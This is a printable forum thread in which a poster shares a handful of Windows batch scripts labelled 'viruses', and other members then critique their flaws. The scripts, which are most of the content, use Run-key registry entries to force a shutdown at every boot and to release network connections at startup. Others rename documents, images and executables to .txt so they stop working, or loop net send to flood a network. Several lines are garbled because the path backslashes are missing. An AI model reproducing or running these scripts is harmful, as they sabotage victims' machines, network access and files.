![]() |
|
6 lil batch viruses - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Coding (https://sinister.li/Forum-Coding--71) +--- Thread: 6 lil batch viruses (/Thread-6-lil-batch-viruses) |
6 lil batch viruses - finalfreak - 12-03-2011 Here is some batch file programmed virus Shutdown computer everytime it is turned on (save as hshutdown.bat) echo @echo off>c:windowshartlell.bat echo break off>>c:windowshartlell.bat echo shutdown -r -t 11 -f>>c:windowshartlell.bat echo end>>c:windowshartlell.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f echo You have been HACKED. PAUSE _______________________ Disable internet permanently (save as hinternet.bat) echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE ______________________________ Change files to non-working TXT files (save as txt.bat) REN *.DOC *.TXT REN *.JPEG *.TXT REN *.LNK *.TXT REN *.AVI *.TXT REN *.MPEG *.TXT REN *.COM *.TXT REN *.BAT *.TXT ______________ System Meltdown (save as Crash.bat) :CRASH net send * WORKGROUP ENABLED net send * WORKGROUP ENABLED GOTO CRASH ipconfig /release shutdown -r -f -t0 echo @echo off>c:windowshartlell.bat echo break off>>c:windowshartlell.bat echo shutdown -r -t 11 -f>>c:windowshartlell.bat echo end>>c:windowshartlell.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f echo You Have Been Hackedecho @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo YOU HAVE BEEN HACKED ***** REN *.DOC *.TXT REN *.JPEG *.TXT REN *.LNK *.TXT REN *.AVI *.TXT REN *.MPEG *.TXT REN *.COM *.TXT REN *.BAT *.TXT PAUSE PAUSE _____________________ Temporarily flood network (save as flood.bat) :CRASH net send * WORKGROUP ENABLED net send * WORKGROUP ENABLED GOTO CRASH _______________________ Temporarily disable internet (save as internet.bat) ipconfig /release Shutdown Computer Once (save as shutdown.bat) shutdown -r -f -t0 RE: 6 lil batch viruses - ArkPhaze - 12-03-2011 Why don't you use code tags? RE: 6 lil batch viruses - finalfreak - 12-03-2011 why should i use them for me this is easier... and i didnt code them either RE: 6 lil batch viruses - ArkPhaze - 02-11-2012 (12-03-2011, 01:32 PM)finalfreak Wrote: why should i use them for me this is easier... Because it's easier for people to read if you put them in code tags. You are sharing it, so it's more about the way it's presented to the people that you wanted to share it with in the first place in my opinion. For this one though: Code: :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED *****
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSEI'm not sure how it's expected to get past this loop to be able to execute any of the rest of the code: Code: :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASHAlso, net send is an older command that became obsolete from Vista and upwards. RE: 6 lil batch viruses - 1234hotmaster - 02-11-2012 viruses? http://www.hackcommunity.com/Thread-The-truth-about-Batch-viruses XD RE: 6 lil batch viruses - Frooxius - 02-11-2012 Also it seems that it misses a lot (well... all of them x3) of back-slashes. Maybe they got lost during database transfer? I dunno. (02-11-2012, 05:18 AM)PhazeShift Wrote: I'm not sure how it's expected to get past this loop to be able to execute any of the rest of the code: I don't think it is expected to get past that loop at all, if you read the first post carefully, you see that this is basically the whole code, so there's no rest of the code. The post mentions 6 "viruses" (in massive sarcasm quotes), 6 batches, so the following code is different batch, as indicated by the "_______________________" separator. It's just like a fork bomb, which also can keep forking itself in an infinite loop, never executing anything after. RE: 6 lil batch viruses - ArkPhaze - 02-12-2012 (02-11-2012, 06:19 AM)Frooxius Wrote: Also it seems that it misses a lot (well... all of them x3) of back-slashes. Maybe they got lost during database transfer? I dunno. Yeah, I read that, but have you actually read through each of the 6 scripts instead of seeing just the ______________'s I see these 6 scripts: - Shutdown computer everytime it is turned on - Disable internet permanently - Change files to non-working TXT files - System Meltdown - Temporarily flood network - Temporarily disable internet And actually OP apparently didn't even count properly as I also see this one: - Shutdown Computer Once So realistically, here are "7 lil batch "viruses"" Each of the bat files he's put into brackets (save as this.bat), and there's 7 of them. None of the scripts use them as call's either or anything of that nature, so they are definitely separate. Although if you look carefully. There are 2 scripts here that you should be looking at: First one: (aka "Crash.bat") Code: :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED *****
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSEAnd this one: (aka "flood.bat") Code: :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASHIt's pointless to have that loop in the first code and write anything after it if there's nothing there, unless it's just a really dumb method of trying to convince the user that it's safe? Disregarding the possibility that the user actually takes time to open the script itself and see what it's all about. I'm not here to debate with you, i'm just showing you how dumb it is for a script to do that. I will say that you've got a good project going on, however I still have my own personal "evaluations" about your project. Just don't hold that one "thread experience" against a member like me which transfers around the forum into a whole bunch of side conflictions with this "tension" between both you and I. |